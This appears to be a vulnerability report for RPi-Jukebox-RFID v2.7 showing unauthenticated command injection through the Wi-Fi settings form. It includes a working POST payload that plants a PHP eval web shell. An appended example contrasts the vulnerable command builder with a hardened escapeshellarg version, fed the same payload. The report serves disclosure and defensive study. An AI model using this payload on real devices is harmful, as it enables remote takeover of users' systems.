RPi-Jukebox-RFID V2.7_RCE_6
xjzzzxx opened this issue · 0 comments
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).
Analysis
The vulnerability is located in htdocs\inc.setWifi.php:
```php
# htdocs\inc.setWifi.php
if(isset($_POST["submitWifi"]) && $_POST["submitWifi"] == "submit") { // Line 8 (Check point)
    $exec = "bash -e <<'END'\n";
    $exec .= "source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh\n";
    $exec .= "clear_wireless_networks\n";
    $tempPOST = $_POST; // Line 14 (Source)
    $_POST=array(); //clear
    foreach ( $tempPOST as $post_key => $post_value ) {
        unset($temp_ssid);
        unset($temp_pass);
        unset($temp_prio);
        if ( substr(trim($post_key), 0, 9) == "WIFIssid_" ) { // Line 20 (check for temp_ssid)
            $temp_ssid = trim($post_value);
            $post_key = "WIFIpass_".substr(trim($post_key), 9); // Line 22 (check for temp_pass)
            $post_value = $tempPOST[$post_key];
            $temp_pass = trim($post_value);
            $post_key = "WIFIprio_".substr(trim($post_key), 9); // Line 25 (check for temp_prio)
            $post_value = $tempPOST[$post_key];
            $temp_prio = trim($post_value);
            if (isset($temp_ssid) && $temp_ssid != "" && isset($temp_pass) && strlen($temp_pass) >= 8) { // Line 28
                if(!isset($temp_prio) || !is_numeric($temp_prio)) {
                    $temp_prio = 0;
                }
                $exec .= "add_wireless_network wlan0 ".$temp_ssid." ".$temp_pass." ".$temp_prio."\n";
            }
        }
    }
    $exec .= "END\n";
    exec("sudo bash -c '". $exec . "'"); // Line 38 (Sink)
}
```
The source is $_POST at Line 14.
Then there is a check point (Line 8), which we bypass by setting $_POST['submitWifi'] = submit.
Finally, the sink executes a complex concatenated command (Line 38).
Let's briefly analyze this concatenated command:
```bash
sudo bash -c 'bash -e <<'END'
source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh
clear_wireless_networks
add_wireless_network wlan0 $temp_ssid $temp_pass $temp_prio
END
'
```
We have three controllable variables ($temp_ssid, $temp_pass, $temp_prio), but they need to meet the corresponding checks (Line 20, Line 22, Line 25 and Line 28). It can be seen that the conditions we need to meet are to use keys with the prefixes WIFIssid_, WIFIpass_ and WIFIprio_, and strlen($temp_pass) >= 8.
In addition, since we are using bash -e mode, we must ensure that all commands before the controllable point execute correctly. That is, we need to find the correct value of $conf['scripts_abs'], which can be found in htdocs/settings.php:
```php
# htdocs/settings.php
include("inc.header.php"); // Line 3 (init $conf['scripts_abs'])
// ...
include("inc.setWifi.php"); // Line 191
```
So we need to POST to htdocs/settings.php.
PoC
```
POST /htdocs/settings.php
```
Data:
```
submitWifi=submit&WIFIssid_123=+%7c%7c+echo+%22%3c%3fphp+%40eval(%5c%5c%5c%24_POST%5b%5c%22shell6%5c%22%5d)%3b+%3f%3e%22+%3e+.%2fshell6.php+&WIFIpass_123=%7c%7c+echo+%221%22+%7c%7c+&WIFIprio_123=1
```
Here is the version without URL encoding for ease of understanding:
```
submitWifi=submit&WIFIssid_123= || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php &WIFIpass_123=|| echo "1" || &WIFIprio_123=1
```
The concatenated command:
```bash
sudo bash -c 'bash -e <<'END'
source /www/admin/cms.jukebox27.com_80/wwwroot/scripts/helperscripts/inc.networkHelper.sh
clear_wireless_networks
add_wireless_network wlan0 || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php || echo "1" || 1
END
'
```
Manual verification
Logs
No response
Configuration
No response
More info
No response
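The command builder from `inc.setWifi.php` beside a hardened form, as an added example that is not part of this issue or of the RPi-Jukebox-RFID code base. It reduces the original logic to a pure function so the PoC input from the report can be fed through both builders and the resulting scripts compared. Function names, the assumed install path in `$scriptsAbs`, and the sample `$post` array are constructed for illustration; the array form of `proc_open()` needs PHP 7.4 or later.

```php
<?php
// Added example, not project code: the inc.setWifi.php builder as a pure
// function, beside a hardened version. Names, the install path and the
// sample input are assumptions for illustration.

// Vulnerable builder: mirrors the original concatenation. Each value lands
// unquoted inside a `bash -e` heredoc, and that script is then wrapped in
// `sudo bash -c '...'`, so a value containing ||, ; or a quote rewrites it.
function buildWifiCommandVulnerable(array $post, string $scriptsAbs): string
{
    $exec  = "bash -e <<'END'\n";
    $exec .= "source " . $scriptsAbs . "/helperscripts/inc.networkHelper.sh\n";
    $exec .= "clear_wireless_networks\n";
    foreach ($post as $key => $value) {
        if (substr(trim($key), 0, 9) !== "WIFIssid_") {
            continue;
        }
        $id   = substr(trim($key), 9);
        $ssid = trim((string) $value);
        $pass = trim((string) ($post["WIFIpass_" . $id] ?? ""));
        $prio = trim((string) ($post["WIFIprio_" . $id] ?? ""));
        if ($ssid !== "" && strlen($pass) >= 8) {
            if (!is_numeric($prio)) {
                $prio = 0;
            }
            $exec .= "add_wireless_network wlan0 " . $ssid . " " . $pass . " " . $prio . "\n";
        }
    }
    $exec .= "END\n";
    return "sudo bash -c '" . $exec . "'";
}

// Allow-list one entry. WPA2 bounds: SSID 1..32 bytes, passphrase 8..63
// printable ASCII characters; priority is an unsigned integer.
function validateWifiEntry(string $ssid, string $pass, string $prio): ?array
{
    if ($ssid === "" || strlen($ssid) > 32 || !ctype_print($ssid)) {
        return null;
    }
    if (strlen($pass) < 8 || strlen($pass) > 63 || !ctype_print($pass)) {
        return null;
    }
    $prio = ctype_digit($prio) ? (string) (int) $prio : "0";
    return [$ssid, $pass, $prio];
}

// Hardened builder: keys are matched strictly, values are validated and then
// single-quoted with escapeshellarg(). The script is returned bare so it can
// be piped to bash on stdin instead of nesting inside a second `bash -c '...'`
// quoting layer, where escapeshellarg()'s own quotes would be unsafe.
function buildWifiScriptHardened(array $post, string $scriptsAbs): string
{
    $script  = "source " . escapeshellarg($scriptsAbs . "/helperscripts/inc.networkHelper.sh") . "\n";
    $script .= "clear_wireless_networks\n";
    foreach ($post as $key => $value) {
        if (!preg_match('/^WIFIssid_([0-9]+)$/', (string) $key, $m)) {
            continue;
        }
        $id    = $m[1];
        $entry = validateWifiEntry(
            trim((string) $value),
            trim((string) ($post["WIFIpass_" . $id] ?? "")),
            trim((string) ($post["WIFIprio_" . $id] ?? ""))
        );
        if ($entry === null) {
            continue;
        }
        [$ssid, $pass, $prio] = $entry;
        $script .= "add_wireless_network wlan0 " . escapeshellarg($ssid) . " "
                 . escapeshellarg($pass) . " " . $prio . "\n";
    }
    return $script;
}

// Run the hardened script by feeding it to `sudo bash -e` on stdin. Returns the exit status.
function runWifiScript(string $script): int
{
    $proc = proc_open(['sudo', 'bash', '-e'], [['pipe', 'r'], ['pipe', 'w'], ['pipe', 'w']], $pipes);
    fwrite($pipes[0], $script);
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);
}

// Constructed input: the PoC from this issue (URL-decoded, whitespace trimmed),
// plus an SSID containing an apostrophe and a short injection attempt that
// satisfies the original length check.
$ssidPayload = <<<'EOT'
|| echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php
EOT;
$post = [
    "submitWifi"   => "submit",
    "WIFIssid_123" => $ssidPayload,    "WIFIpass_123" => '|| echo "1" ||', "WIFIprio_123" => "1",
    "WIFIssid_7"   => "Cafe's WiFi",   "WIFIpass_7"   => "x || id; #",     "WIFIprio_7"   => "5",
];
$scriptsAbs = "/home/pi/RPi-Jukebox-RFID/scripts"; // assumed install path

echo "--- vulnerable: the PoC value becomes shell syntax ---\n";
echo buildWifiCommandVulnerable($post, $scriptsAbs);
echo "--- hardened: PoC entry rejected (SSID too long), the rest quoted as data ---\n";
echo buildWifiScriptHardened($post, $scriptsAbs);
```

In the vulnerable output the PoC line reads `add_wireless_network wlan0 || echo "<?php ... ?>" > ./shell6.php || echo "1" || 1`, exactly as in the report; in the hardened output the PoC entry is dropped by the 32-byte SSID limit, and the second entry becomes `add_wireless_network wlan0 'Cafe'\''s WiFi' 'x || id; #' 5`, where the `||` and `;` are ordinary characters inside a single-quoted argument. The length and character allow-list are defence in depth; `escapeshellarg()` alone already prevents the injection once the outer `bash -c '...'` wrapper is gone.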